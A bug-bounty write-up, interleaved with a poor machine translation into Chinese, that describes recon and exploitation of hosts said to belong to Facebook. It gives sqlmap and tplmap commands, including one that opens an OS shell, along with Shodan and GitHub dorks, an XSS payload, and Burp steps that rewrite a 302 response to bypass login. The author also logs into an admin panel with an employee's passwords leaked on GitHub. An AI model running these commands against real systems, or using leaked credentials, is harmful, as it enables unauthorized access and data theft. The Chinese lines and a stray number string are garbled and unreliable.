How I Found Multiple Bugs On FaceBook In 1 Month And a Part For My Methodology & Tools

我是如何在一个月内发现 FaceBook 上的多个 bug 和我的方法论和工具的一部分

Hay Hunters , Hello Infosec Community

干草猎人,你好信息安全社区

Iam Orwa [https://twitter.com/GodfatherOrwa]

this my 2nd writeup, the first one is about Full Map To Github Recon And Leaks Exposure , seen many people getting hall of fames and bounties from Facebook , Aditi Singh Smart Girl these girl who motivated me to work on this program [https://twitter.com/aditi_singghh]

这是我的第二篇文章,第一篇是关于 Github Recon And Leaks Exposure 的完整地图,看到许多人从 Facebook 获得名人堂和奖金,Aditi Singh Smart Girl 这些女孩激励我参与这个项目[ https://twitter.com/aditi_singghh ]

As you see in the title In these Write up i Will Speak about How I Found Not What I Found

正如你在标题中看到的,在这些写作中,我将谈论我如何发现而不是我发现了什么

What matters to me here is for the reader to learn

在这里,对我来说重要的是读者能够学习

So I will talk about all my discoveries in FaceBook and a part for my methodology

因此,我将谈论我在 FaceBook 上的所有发现,以及我的方法论的一部分

duplicate and accepted

复制并接受

before starting
Everything was done in cooperation with HackerX007
He is a very smart and creative person. I suggest everyone to follow him [https://twitter.com/XHackerx007]

他是一个非常聪明和富有创造力的人。我建议每个人都跟随他的 https://twitter.com/xhackerx007

also HackerX007 on bugcrowd Leaderboard rankings Top 10 on P1 , Top 100 on Full Ranking

007 on bugcrowd Leaderboard rankings Top 10 on P1,Top 100 on Full Ranking

A: What The Multiple Bugs That found

1 Server-Side Template Injection To RCE (Critical)

1服务器端模板注入到 RCE (关键)

2 SQL Injection [2] (Critical)

2 SQL 注入[2](关键)

3 Authentication Bypass(Critical)

3认证绕过(关键)

4 Privilege Escalation (Critical)

4权限提升(危急)

5 Multiple Reflected XSS (Medium)

5多重反射 XSS (中)

B: Tools And Extensions You Need it

1 FFUF Or Dirsearch i Like Both

1 FFUF 或 Dirsearch i Like Both

2 Good Word list for me i like to use the legend Random Robbie Word list https://github.com/random-robbie/bruteforce-lists

2好词汇列表我喜欢使用传奇的 Random Robbie 词汇列表/ https://github.com/Random-Robbie/bruteforce-lists

3 Amass For Sub domain i also check on github for sub domains also you can fuzz for sub domain by using good wordlist the good command that i use for Amass

3 Amass For Sub domain i also check on github For Sub domains and you can fuzz For Sub domain by using good wordlist the good command that i use For Amass

  • For List of domains==> amass enum -passive -norecursive -noalts -df list-domains.txt -o subs.txt
  • 对于域名列表 = = > amass enum-passive-norecursive-noalts-df List-domains.txt-o subs.txt
  • For Senile domain==> amass enum -passive -norecursive -noalts -d domain-o subs.txt
  • 对于老年域 = = > amass enum-passive-norecursive-noalts-d domain-o subs.txt

4 Httpx and httprobe And Nmap

4 Httpx 和 httprobe And Nmap

5 Wappalyzer Extensions

6 Burp Pro With These Extensions

6带有这些扩展的打嗝专业版

  • Collaborator Everywhere 无处不在的合作者
  • XSS Validator
  • Wsdler
  • .NET Beautifier . NET Beautifier
  • Bypass WAF 旁路 WAF
  • J2EEScan 2eescan
  • Param Miner 帕拉姆矿工
  • Wayback Machine
  • JS Link Finder 链接查找器
  • Upload Scanner 上传扫描器
  • Nucleus Burp Extension 囊核延长
  • Software Vulnerability Scanner 软件漏洞扫描器
  • Active Scan++ 主动扫描 + +

7 Acunetix Scanner or If you Looking for something free and cool [reNgine]

7 Acunetix Scanner 或 If you Looking for something free and cool [ reNgine ]

C: How I Found Multiple Bugs

1 on First Domain

SQL Injection [2] & Authentication Bypass & XSS [2]

SQL 注入[2] & 身份验证绕过 & XSS [2]

Started My Recon By Checking For Some Cool domains by Dorking for Facebook page on Github **Dorking to Find domains and some cool ends

通过检查一些很酷的域名启动了我的侦查,这些域名是 Dorking 在 Github 上的 Facebook 页面上查找域名和一些很酷的结尾

So what that dorks i try

所以我尽力让那些笨蛋

  • org:facebookresearch ftp
  • org:facebookresearch Ldap
  • org:facebookresearch https://
  • finely after about 30 min dorking last dork i still remmber
  • 最后一个呆子呆了30分钟后,我还记得

org:facebookresearch language:python .php

1.2.2.2.2.2.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3.3

i get luck to found some interesting End it was

我很幸运地发现了一些有趣的结局

domain/login/_ajax/verify-2fa.php

Domain/login/_ ajax/verify-2fa. php

When i Visit these Domain its Employee Panel It is owned by Instagram

当我访问这些域名时,它的员工面板属于 Instagram

directly Start Looking for SQL testing query 1' Error back with `MySQL’ so now its look Parameter usernamevulnerable

直接开始查找 SQL 测试查询1’错误返回’MySQL’所以现在它的外观参数 usernamevulnerable

so on burp intercept request and make a copy in txtfile

所以打嗝拦截请求,并在 txtfile 中复制一份

On Sqlmap i run these Command

在 Sqlmap 上我运行这些命令

sqlmap -r request.txt -p username --dbms="MySQL" --force-ssl --level 5 --risk 3 --dbs --hostname

and BooM its done

然后砰的一声,就搞定了

So after that i `Spider` the Full host and and fuzz for `php` using php word list and after that Active Scan on Burp for ALL the Post Request

所以之后,我’蜘蛛’的完整的主机和模糊为’php’使用 php 的字列表,之后积极扫描打嗝为所有的后请求

`Keep the Maximum insertion pointe per base request 10`

保持每个基地请求的最大插入点为10

What i found

我的发现

  • another SQL 另一个 SQL
  • 2 XSS payload 2 XSS 有效载荷
"><img src=x onerror=alert(1)>

SQL Close as duplicate because The Security testing know about that and they work to fix it also Xss 1 duplicate and 1 accepted

SQL Close 是重复的,因为安全测试知道这一点,他们的工作,以修复它也 ss 1重复和1接受

Here HackerX007 He messed around a bit
as he also an artist with manual Testing Found a vary Cool Authentication Bypass

这里 HackerX007他玩了一点,因为他也是一个手动测试的艺术家发现了一个很酷的认证绕过

Authentication Bypass That Allow Unauthenticated User To Take ActionsWhen visit domain/location/?5 you will redirect to login pagebut on brup when visit one will redirect but the Content-Length of redirect response so big 6443After looking in the response he found out in this 302 response, the panel was without any Authentication. in the 302 response contentso 
after some playing with burp match and replace It was able to bypass Authentication and taking some actions.at first i was think its just front-end bypass , But i found out i can take action, like enable ,un enable Bucket#Repro Steps1. IN burp match and replace add this:type: response headermatch : HTTP/1.1 302 Foundreplace: HTTP/1.1 200 ok__type: response headermatch : Location: ../login/?redirect=//location/?5replace:
2. now go to domian//location/?5
BooM4. when you done you can [Logout] 😂

these Authentication Bypass accepted

这些认证绕过接受

2 SHODAN IP And SSTI To RCE

Started recon for Ip belongs for Facebook

开始侦查 Ip 属于 Facebook

the good dork you can use in these case

你可以用在这个案子里的好呆子

if you looking for domains or Ip belong for program

如果你寻找域名或 Ip 属于程序

Org:"FaceBook Inc." without 200 dont need live Ip in these case

Org: 没有200的“ FaceBook 公司”在这种情况下不需要 live Ip

if you looking for cool subs or Ip on the domain

如果你寻找很酷的潜艇或 Ip 的域名

Ssl.cert.subject.CN:"facebook.com" 200

Ssl.cert.subject.cn : “ facebook. com”200

so found a interesting Ip that include prot 10000 but not working

所以发现了一个有趣的 Ip,包括 prot 10000但不工作

so i scan that Ip on Nmap Nmap -sV ip

我扫描了 Nmap 上的 Ip-sV Ip

its show Port 8443 Open

其显示端口8443开放

when i check it [ its a AWS host owned by Facebook]

当我查看它时(它是 Facebook 旗下的一个 AWS 主机)

now i collect lot of Ip like these and send them to scan on Acunetix to run in background

现在我收集了很多像这样的 Ip,并发送给他们扫描上 Acunetix 运行在后台

after about 1 hour back to check on Acunetix its show these Ip vulnerable with SSTI and payload was set in parameter mode that call debug in python so i try the normal payload {{5*5}} so found in source 25 the easy and fast way here to check use tplmap tool its similar for sqlmap to install

大约1小时后回来检查 Acunetix,它显示这些 Ip 脆弱与 SSTI 和有效载荷设置在参数模式调用调试在 python,所以我尝试正常有效载荷{5 * 5}所以发现在源码25这里检查使用 tplmap 工具其类似的 sqlmap 安装简单快捷的方式

git clone https://github.com/epinna/tplmap.git

after testing these parameter its show its vulnerable with SSTI

在测试了这些参数之后,它显示了它的脆弱性与 SSTI

so my command was

所以我的命令是

./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*"

===>

GET parameter: modeEngine: Jinja2Injection: {{*}}Context: textOS: posix-linuxTechnique: render

what make my happy here that

是什么让我在这里快乐

python code evaluation is Ok

Python 代码求值是 Ok

that mean i can

也就是说我可以

execution command on shell 
and 
Bind and reverse shell
and
File write and read 
but not in all the cases 

so what i need only connect on shell

所以我只需要连接到 shell

./tplmap.py -u "https://ip:8443/consent?assignmentId=debugKUymD&hitId=debugiwTmj&mode=debug*" --os-shell  

only check id and ping burp

只检查身份证和打嗝

BooM

繁荣

these SSTI accepted

这些 SSTI 接受了

3 Privilege Escalation

3. 权限提升

here i visit crt.sh to tack about 5 interesting domains

这里我访问 crt.sh 添加了5个有趣的域名

https://crt.sh/?q=Facebook+Inc.

but for subdomains gathering i dont wanna the normal way

但是对于子域名收集,我不想要正常的方式

i fuzz for sub domains with a good and big word list i made it

I fuzz for subdomains with a good and big word list i made it

you can also made one for you

你也可以为自己做一个

after that filtered to Live using httprobe

使用 httprobe 过滤到 Live

cat sub.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -p https:10000 -p http:9000 -p https:9443 -c 50 | tee live-subs2.txt

so found here domain run on Port 10000

所以在这里发现域运行端口10000

so when i visit it was a interesting panel for mange servers and lot of other things

所以当我访问的时候,它是一个有趣的管理服务器和许多其他东西的面板

so when check on its run with lot of technologies

因此,当检查它的运行与许多技术

dirsearch on the panel and waw misconfiguration that some endpoints is accessible without any login ok its cool find to report but still

在面板上 dirsearch 和 waw 错误配置,一些端点是可访问的,没有任何登录 ok 其冷静的查找报告,但仍然

without any Privilege like edit , del , add etc..

没有任何特权,比如编辑、删除、添加等等。

so i need to keep working to find something good

所以我需要继续努力,找到一些好东西

  • i also try login with some default Credentials but not working also try to sing up but the register cant be without login using admin Credentials
  • 我也尝试登录与一些默认的凭证,但不工作,也尝试唱起来,但登记不能没有登录使用管理员凭证
by check on some endpoints i found server Info with that info full name of the admin who create that

so its take 5 min to find that employee repo on github

所以要花5分钟才能在 github 上找到员工回复

so start dorking on employee repo for any password

所以开始用员工回收密码吧

i try

我尽力了

password
passwd 
pwd
pass
pw
login

found internal host and user and password github leak like these

发现内部主机和用户和密码 github 泄漏这样的

$host = ************
$User = ************
$pwd  = ************

scanned the internal host for ports nothing open

扫描内部主机,看看有没有打开的端口

so i try to login use the username and the password and BooM 😎🥳 its work with Full Privilege

所以我尝试登录使用用户名和密码和 BooM 它的工作与完全特权

after Login i can

登入后,我可以

Full Access and Control
add users
del users
Etc...

also 1 stored XSS in these panel 😎

也1存储 XSS 在这些面板

I Hope you guys have enjoyed the Reading

希望你们喜欢这次阅读会

and hope you learn and found bugs and tweet by that for me that will make my happy

希望你们能学习,发现漏洞,帮我发推特,让我开心

Stay safe dears

注意安全,亲爱的

Iam not Good in Writes up If there are spelling mistakes please avoid

我写得不好如果有拼写错误请避免

The biggest Lie
when they told: it’s not simple
if someone telling you it’s not simple 90% will give up

当他们说谎时最大的谎言: 如果有人告诉你这不简单,事情就不简单了,90% 的人会放弃

everything simple in these life
its just need 2 things
1- no matter what happens ==> Never Ever give up

生活中的一切都很简单,只需要两样东西1——不管发生什么 = > 永远不要放弃

2- Arrange your work Arrange your life Arrange your time
Do not work in any field in life in a random way

安排你的工作安排你的生活安排你的时间不要在生活中的任何领域随意工作

Thanks all

谢谢大家

https://twitter.com/GodfatherOrwa

Dont forget also Follow HackerX007 I suggest everyone to follow him

别忘了也跟着 HackerX007我建议大家跟着他

https://twitter.com/XHackerx007